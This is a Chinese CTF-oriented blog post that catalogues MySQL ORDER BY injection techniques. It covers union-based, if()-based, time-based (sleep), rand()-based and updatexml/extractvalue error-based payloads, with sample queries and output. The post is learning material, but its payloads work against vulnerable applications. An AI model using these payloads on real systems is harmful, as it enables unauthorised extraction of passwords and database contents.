<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		 
			
  
    <meta name="twitter:card" content="summary"/>
    
      <meta name="twitter:image" content="https://yang1k.github.io/images/avatar.png" />
    
  
  
  <meta name="twitter:title" content="sql注入之order by注入"/>
  <meta name="twitter:description" content="在安恒杯看到了利用order by进行盲注，记得自己之前好像总结过order by后的注入方法，翻笔记发现确实是有一篇标题为order by注入的笔记，然而里面什么都没写。看了下详细信息，发现是17年8月11号创建的。真的是拖延症拖到忘记啊。
"/>
  
  
  
  
    <meta name="twitter:creator" content="@Yang1k"/>
  



		
		<meta name="author" content="Yang1k">
		<meta name="description" content="Site Description">
		<meta name="generator" content="Hugo 0.56.0" />
		<title>sql注入之order by注入 &middot; Yang1k</title>
		<link rel="shortcut icon" href="https://yang1k.github.io/images/favicon.ico">
		<link rel="stylesheet" href="https://yang1k.github.io/css/style.css">
		<link rel="stylesheet" href="https://yang1k.github.io/css/highlight.css">

		
		<link rel="stylesheet" href="https://yang1k.github.io/css/font-awesome.min.css">
		

		
		<link href="https://yang1k.github.io/index.xml" rel="alternate" type="application/rss+xml" title="Yang1k" />
		

		
	</head>

    <body>
       <nav class="main-nav">
	
	
		<a href='https://yang1k.github.io/'> <span class="arrow">←</span>Home</a>
	
	<a href='https://yang1k.github.io/post'>Archive</a>
	<a href='https://yang1k.github.io/tags'>Tags</a>
	<a href='https://yang1k.github.io/about'>About</a>

	

	
	<a class="" href="https://yang1k.github.io/index.xml">RSS</a>
	
</nav>


        <section id="wrapper" class="post">
            <article>
                <header>
                    <h1>
                        sql注入之order by注入
                    </h1>
                    <h2 class="headline">
                    Jan 1, 0001 00:00
                    · 427 words
                    · 3 minute read
                      <span class="tags">
                      
                      
                          
                              <a href="https://yang1k.github.io/tags/ctf">ctf</a>
                          
                      
                      
                      </span>
                    </h2>
                </header>
                
                  
                    <div id="toc">
                      <nav id="TableOfContents">
<ul>
<li>
<ul>
<li><a href="#了解order-by">了解order by</a></li>
<li><a href="#order-by盲注">order by盲注</a>
<ul>
<li><a href="#结合union来盲注">结合union来盲注</a></li>
<li><a href="#基于if-盲注">基于if()盲注</a>
<ul>
<li><a href="#需要知道列名">需要知道列名</a></li>
<li><a href="#不需要知道列名">不需要知道列名</a></li>
</ul></li>
<li><a href="#基于时间的盲注">基于时间的盲注</a></li>
<li><a href="#基于rang-的盲注">基于rang()的盲注</a></li>
</ul></li>
<li><a href="#order-by-报错注入">order by 报错注入</a>
<ul>
<li><a href="#updatexml">updatexml</a></li>
<li><a href="#extractvalue">extractvalue</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
                    </div>
                  
                
                <section id="post-body">
                    <p>在安恒杯看到了利用order by进行盲注，记得自己之前好像总结过order by后的注入方法，翻笔记发现确实是有一篇标题为order by注入的笔记，然而里面什么都没写。看了下详细信息，发现是17年8月11号创建的。真的是拖延症拖到忘记啊。
<!-- more --></p>

<h2 id="了解order-by">了解order by</h2>

<p>order by是mysql中对查询数据进行排序的方法，
使用示例</p>

<pre><code>select * from 表名 order by 列名(或者数字) asc；升序(默认升序)
select * from 表名 order by 列名(或者数字) desc；降序
</code></pre>

<p>这里的重点在于order by后既可以填列名或者是一个数字。举个例子：
id是user表的第一列的列名，那么如果想根据id来排序，有两种写法:</p>

<pre><code>select * from user order by id;
selecr * from user order by 1;
</code></pre>

<h2 id="order-by盲注">order by盲注</h2>

<h3 id="结合union来盲注">结合union来盲注</h3>

<p>这个是在安恒杯月赛上看到的。
后台关键代码</p>

<pre><code>$sql = 'select * from admin where username='&quot;.$username.&quot;'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)&amp;&amp;row['username']!=&quot;admin&quot;){
	$hit=&quot;username error!&quot;;
}else{
	if ($row['password'] === $password){
		$hit=&quot;&quot;;
	}else{
		$hit=&quot;password error!&quot;;
	}
             
}
</code></pre>

<p>payload</p>

<pre><code>username=admin' union 1,2,'字符串' order by 3
</code></pre>

<p>sql语句就变为</p>

<pre><code>select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;
</code></pre>

<p>这里就会对第三列进行比较，即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。
注意的是最好加上binary，因为order by比较的时候不区分大小写。</p>

<p>示例</p>

<pre><code>mysql&gt; select * from order1;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | uP10AcB |
+------+----------+----------+
mysql&gt; select * from order1 where username='' or 1 union select 1,2,'v' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | uP10AcB |
| 1 | 2 | v |
+------+----------+----------+


mysql&gt; select * from order1 where username='' or 1 union select 1,2,'a' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | 2 | a |
| 1 | admin | uP10AcB |
+------+----------+----------+

mysql&gt; select * from order1 where username='' or 1 union select 1,2,'u' order by 3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | 2 | u |
| 1 | admin | uP10AcB |
+------+----------+----------+

</code></pre>

<p>这里的order by 3是根据第三列进行排序，如果我们union查询的字符串比password小的话，我们构造的 1,2,a就会成为第一列，那么在源码对用户名做对比的时候，就会返回username error!，如果union查询的字符串比password大，那么正确的数据就会是第一列，那么页面就会返回password error!.</p>

<h3 id="基于if-盲注">基于if()盲注</h3>

<h4 id="需要知道列名">需要知道列名</h4>

<p>order by的列不同，返回的页面当然也是不同的，所以就可以根据排序的列不同来盲注。</p>

<p>示例：</p>

<pre><code>order by if(1=1,id,username);

</code></pre>

<p>这里如果使用数字代替列名是不行的，因为if语句返回的是字符类型，不是整型。</p>

<h4 id="不需要知道列名">不需要知道列名</h4>

<p>payload</p>

<pre><code>order by if(表达式,1,(select id from information_schema.tables))
</code></pre>

<p>如果表达式为false时，sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误，导致查询内容为空，如果表达式为true是，则会返回正常的页面。</p>

<h3 id="基于时间的盲注">基于时间的盲注</h3>

<p>payload</p>

<pre><code>order by if(1=1,1,sleep(1))
</code></pre>

<p>测试结果</p>

<pre><code>select * from ha order by if(1=1,1,sleep(1)); #正常时间
select * from ha order by if(1=2,1,sleep(1)); #有延迟
</code></pre>

<p>测试的时候发现延迟的时间并不是sleep(1)中的1秒，而是大于1秒。
最后发现延迟的时间和所查询的数据的条数是成倍数关系的。
计算公式：</p>

<pre><code>延迟时间=sleep(1)的秒数*所查询数据条数
</code></pre>

<p>我所测试的ha表中有五条数据，所以延迟了5秒。如果查询的数据很多时，延迟的时间就会很长了。
在写脚本时，可以添加timeout这一参数来避免延迟时间过长这一情况。</p>

<h3 id="基于rang-的盲注">基于rang()的盲注</h3>

<p>原理不赘述了，直接看测试结果</p>

<pre><code>mysql&gt; select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
|  9 | NULL |
|  6 | NULL |
|  5 | NULL |
|  1 | dss  |
|  0 | dasd |
+----+------+
mysql&gt; select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
|  1 | dss  |
|  6 | NULL |
|  0 | dasd |
|  5 | NULL |
|  9 | NULL |
+----+------+
</code></pre>

<p>可以看到当rang()为true和false时，排序结果是不同的，所以就可以使用rang()函数进行盲注了。
例</p>

<pre><code>order by rand(ascii(mid((select database()),1,1))&gt;96)
</code></pre>

<h2 id="order-by-报错注入">order by 报错注入</h2>

<p>在网上还看到了order by后的报错注入。
<a href="http://www.cnblogs.com/icez/p/Mysql-Order-By-Injection-Summary.html">原文链接</a></p>

<h3 id="updatexml">updatexml</h3>

<pre><code>select * from ha order by updatexml(1,if(1=1,1,user()),1);#查询正常
select * from ha order by updatexml(1,if(1=2,1,user()),1);#查询报错
</code></pre>

<h3 id="extractvalue">extractvalue</h3>

<pre><code>select * from ha order by extractvalue(1,if(1=1,1,user()));#查询正常
select * from ha order by extractvalue(1,if(1=2,1,user()));#查询报错
</code></pre>
                </section>
            </article>

            
                <a class="twitter" href="https://twitter.com/intent/tweet?text=https%3a%2f%2fyang1k.github.io%2fpost%2fsql%25E6%25B3%25A8%25E5%2585%25A5%25E4%25B9%258Border-by%25E6%25B3%25A8%25E5%2585%25A5%2f - sql%e6%b3%a8%e5%85%a5%e4%b9%8border%20by%e6%b3%a8%e5%85%a5 "><span class="icon-twitter"> tweet</span></a>

<a class="facebook" href="#" onclick="
    window.open(
      'https://www.facebook.com/sharer/sharer.php?u='+encodeURIComponent(location.href),
      'facebook-share-dialog',
      'width=626,height=436');
    return false;"><span class="icon-facebook-rect"> Share</span>
</a>

            

            
                <div id="disqus_thread"></div>
<script type="text/javascript">
    var disqus_shortname = 'your_disqus_short_name'; 

     
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>

            

            

            <footer id="footer">
    
    <p class="small">
    
       © Copyright 2020 <i class="fa fa-heart" aria-hidden="true"></i> Yang1k
    
    </p>
    <p class="small">
        Powered by <a href="http://www.gohugo.io/">Hugo</a> Theme By <a href="https://github.com/nodejh/hugo-theme-cactus-plus">nodejh</a>
    </p>
</footer>

        </section>

        <script src="https://yang1k.github.io/js/jquery-3.3.1.min.js"></script>
<script src="https://yang1k.github.io/js/main.js"></script>
<script src="https://yang1k.github.io/js/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>




  
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'your_google_analytics_id', 'auto');
	
	ga('send', 'pageview');
}
</script>





    </body>
</html>
